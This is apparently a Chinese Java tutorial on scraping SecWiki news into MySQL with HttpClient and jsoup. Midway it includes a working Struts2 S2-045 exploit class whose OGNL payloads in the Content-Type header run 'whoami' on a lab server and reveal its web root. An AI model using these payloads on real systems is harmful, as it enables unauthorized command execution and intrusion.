爬取SecWiki安全技术网站技术到mysql数据库中
<!-- 第一步: 导包 --> <dependency> <groupId>org.apache.httpcomponents</groupId> <artifactId>httpclient</artifactId> <version>4.3.1</version> </dependency>
package cn.test.requestdata;
import org.apache.http.Header;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
import java.io.IOException;
public class HttpClientGet {
public static void main(String[] args){
new Get().start();
}
}
class Get extends Thread{
//发送请求, 获取数据
CloseableHttpClient httpClient = HttpClients.createDefault(); // 获取httpClient对象
public void run(){
//确定url
String url = "http://192.168.174.133:8080/struts2/";
//创建请求方式
HttpGet httpGet = new HttpGet(url);
//设置请求参数: 请求头
httpGet.setHeader("user-agent","Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36");
try {
//发送请求, 获得响应对象
// CloseableHttpResponse包含了响应行, 响应头, 响应体
CloseableHttpResponse response = httpClient.execute(httpGet);
//获取数据
String html = EntityUtils.toString(response.getEntity(), "UTF-8");
System.out.println(html);
} catch (IOException e) {
e.printStackTrace();
}
}
}
package cn.test.requestdata;
import org.apache.http.HttpEntity;
import org.apache.http.NameValuePair;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.message.BasicNameValuePair;
import org.apache.http.util.EntityUtils;
import java.io.IOException;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
public class HttpClientPost {
public static void main(String[] args){
new Post().start();
}
}
class Post extends Thread{
//获取httpClient实例,用来执行请求
CloseableHttpClient httpClient= HttpClients.createDefault();
public void run(){
//指定url
String url="http://192.168.174.133:8080/struts2/";
//指定发送方式 post
HttpPost httpPost=new HttpPost(url);
try {
//封装参数
List<NameValuePair> list = new ArrayList<NameValuePair>();
list.add(new BasicNameValuePair("userName","天心"));
list.add(new BasicNameValuePair("password", "996"));
HttpEntity entity = new UrlEncodedFormEntity(list);
httpPost.setEntity(entity);
//执行请求
CloseableHttpResponse response = httpClient.execute(httpPost);
//获取数据
String html= EntityUtils.toString(response.getEntity(),"utf-8");
System.out.println(html);
} catch (IOException e) {
e.printStackTrace();
}
}
}
package cn.test.requestdata;
import org.apache.http.Header;
import org.apache.http.HttpEntity;
import org.apache.http.NameValuePair;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.message.BasicNameValuePair;
import org.apache.http.util.EntityUtils;
import java.io.IOException;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
public class Struts045 {
public static void main(String[] args){
HttpClientPost();
}
public static void HttpClientPost(){
String url = "http://192.168.174.133:8080/struts2/";
//打印回显
//String payload = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))." + "(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('exist Struts045')).(#o.close())}";
//探测路径
//String payload = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#outstr=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#outstr.println(#req.getRealPath(\"/\"))).(#outstr.close()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}";
//命令执行
String payload = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}";
//文件上传
//String payload ="";
//获取httpClient实例,用来执行请求
CloseableHttpClient httpClient= HttpClients.createDefault();
//指定发送方式 post
HttpPost httpPost=new HttpPost(url);
httpPost.setHeader("Content-Type", payload);
httpPost.setHeader("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36");
try {
//封装参数
List<NameValuePair> list = new ArrayList<NameValuePair>();
list.add(new BasicNameValuePair("userName","天心"));
list.add(new BasicNameValuePair("password", "996"));
HttpEntity entity = new UrlEncodedFormEntity(list);
httpPost.setEntity(entity);
//执行请求
CloseableHttpResponse response = httpClient.execute(httpPost);
//获取数据
String html= EntityUtils.toString(response.getEntity(),"utf-8");
System.out.println(html);
} catch (IOException e) {
e.printStackTrace();
}
}
}
命令执行检测效果如下:
<!-- 第一步: 导包 --> <dependency> <groupId>org.jsoup</groupId> <artifactId>jsoup</artifactId> <version>1.10.2</version> </dependency>
使用jsoup的前提, 需要先获取到document对象。本次使用基于css的选择器来解析HTML文档。
package cn.test.spider1;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;
import java.io.*;
public class SpiderSecwikitxt {
public static void main(String[] args) throws IOException, InterruptedException {
//确定url地址
String urll="https://www.sec-wiki.com/news?News_page=";
for(int i=1;i<11;i++){
String url=urll+i;
getUrl(url);
}
}
private static void getUrl(String url) throws IOException {
//获取httpclient对象
CloseableHttpClient httpClient = HttpClients.createDefault();
//获取请求方式
HttpGet httpGet=new HttpGet(url);
//执行请求
CloseableHttpResponse response = httpClient.execute(httpGet);
//获取页面
String html= EntityUtils.toString(response.getEntity(),"utf-8");
//System.out.println(html);
//解析网页
Document document= Jsoup.parse(html);
//获取网页所有的表格
Elements element = document.select("[class=items table]").select("tr");
//System.out.println(element.text());
FileOutputStream fos=null;
for(int i=0;i<element.size()-1;i++){//遍历每一个行
fos = new FileOutputStream("D://spider//spider.txt",true);
//获取每一行的列
Elements tds = element.get(i).select("td:first-child");
String time = tds.text();
//获取time
System.out.print(time+" ");
Elements select = element.get(i).select("td:nth-child(2)");
String title = select.text();
//获取title
System.out.print(title+" ");
//获取url链接
String href = element.get(i).select("td>a").attr("href");
System.out.println(href+" ");
fos.write(time.getBytes());
fos.write(" ".getBytes());
fos.write(title.getBytes());
fos.write(" ".getBytes());
fos.write(href.getBytes());
fos.write("\r\n".getBytes());
}
fos.close();
}
}
txt效果如下
package cn.test.spider1;
import cn.test.mapper.EventDao;
import cn.test.pojo.Event;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.select.Elements;
import java.io.IOException;
public class SpiderSecwikimysql {
private static EventDao eventDao = new EventDao();
public static void main(String[] args) throws IOException {
//确定url地址
String urll="https://www.sec-wiki.com/news?News_page=";
for(int i=1;i<11;i++){
String url=urll+i;
getUrl(url);
}
}
private static void getUrl(String url) throws IOException {
//获取httpclient对象
CloseableHttpClient httpClient = HttpClients.createDefault();
//获取请求方式
HttpGet httpGet=new HttpGet(url);
//执行请求
CloseableHttpResponse response = httpClient.execute(httpGet);
//获取页面
String html= EntityUtils.toString(response.getEntity(),"utf-8");
//System.out.println(html);
//解析网页
Document document= Jsoup.parse(html);
//获取网页所有的表格
Elements element = document.select("[class=items table]").select("tr");
//System.out.println(element.text());
for(int i=0;i<element.size()-1;i++){//遍历每一个行
Event event=new Event();
//获取每一行的列
Elements tds = element.get(i).select("td:first-child");
String time = tds.text();
//获取time
System.out.print(time+" ");
event.setTime(time);
Elements select = element.get(i).select("td:nth-child(2)");
String title = select.text();
//获取title
System.out.print(title+" ");
event.setTitle(title);
//获取url链接
String href = element.get(i).select("td>a").attr("href");
System.out.println(href);
event.setUrl(href);
//进行保存数据
eventDao.addEvent(event);
}
}
}
通过EventDao类保存到mysql数据库中
package cn.test.mapper;
import cn.test.pojo.Event;
import com.mchange.v2.c3p0.ComboPooledDataSource;
import org.springframework.jdbc.core.JdbcTemplate;
import java.beans.PropertyVetoException;
public class EventDao extends JdbcTemplate{
public EventDao(){
ComboPooledDataSource dataSource=new ComboPooledDataSource();
//数据库的四大必要参数: driver 连接字符串 用户名 密码
try {
dataSource.setDriverClass("com.mysql.jdbc.Driver");
dataSource.setJdbcUrl("jdbc:mysql://localhost:3306/spider?characterEncoding=UTF-8");
dataSource.setUser("root");
dataSource.setPassword("root");
} catch (PropertyVetoException e) {
e.printStackTrace();
}
//将DataSource设置到jdbcTemplate
super.setDataSource(dataSource);
}
//添加事件数据的方法
public void addEvent(Event event){
String sql="insert into spidersecwiki values(?,?,?)";
String[] params ={event.getTime(),event.getTitle(),event.getUrl()};
update(sql,params);
}
}
定义Event类
package cn.test.pojo;
public class Event {
/**
* 事件时间
*/
private String time;
/**
* 事件主题
*/
private String title;
/**
* 事件url地址
*/
private String url;
public Event() {
}
public Event(String time, String title, String url) {
this.time = time;
this.title = title;
this.url = url;
}
public String getTime() {
return time;
}
public void setTime(String time) {
this.time = time;
}
public String getTitle() {
return title;
}
public void setTitle(String title) {
this.title = title;
}
public String getUrl() {
return url;
}
public void setUrl(String url) {
this.url = url;
}
@Override
public String toString() {
return "Event{" +
"time='" + time + '\'' +
", title='" + title + '\'' +
", url='" + url + '\'' +
'}';
}
}
存入mysql数据库中如下: